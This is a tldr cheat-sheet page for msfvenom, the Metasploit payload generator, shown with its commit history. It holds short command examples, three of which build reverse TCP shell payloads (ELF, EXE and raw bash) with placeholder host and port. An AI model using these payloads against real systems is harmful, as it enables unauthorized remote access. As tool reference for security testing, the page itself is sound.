Files
tldr/pages/common/msfvenom.md
Fazle Arefin cf7215e832 msfvenom: add raw example (#8095)
* Use built in output option in msfvenom

* Add msfvenom example to generate bash reverse tcp handler

* Add newline to the end of msfvenom file

* Update pages/common/msfvenom.md

Co-authored-by: Axel Navarro <navarroaxel@gmail.com>

Co-authored-by: Axel Navarro <navarroaxel@gmail.com>
2022-05-30 13:58:30 +08:00

29 lines
780 B
Markdown

# msfvenom
> Manually generate payloads for metasploit.
> More information: <https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>.
- List payloads:
`msfvenom -l payloads`
- List formats:
`msfvenom -l formats`
- Show payload options:
`msfvenom -p {{payload}} --list-options`
- Create an ELF binary with a reverse TCP handler:
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}`
- Create an EXE binary with a reverse TCP handler:
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}`
- Create a raw bash with a reverse TCP handler:
`msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw`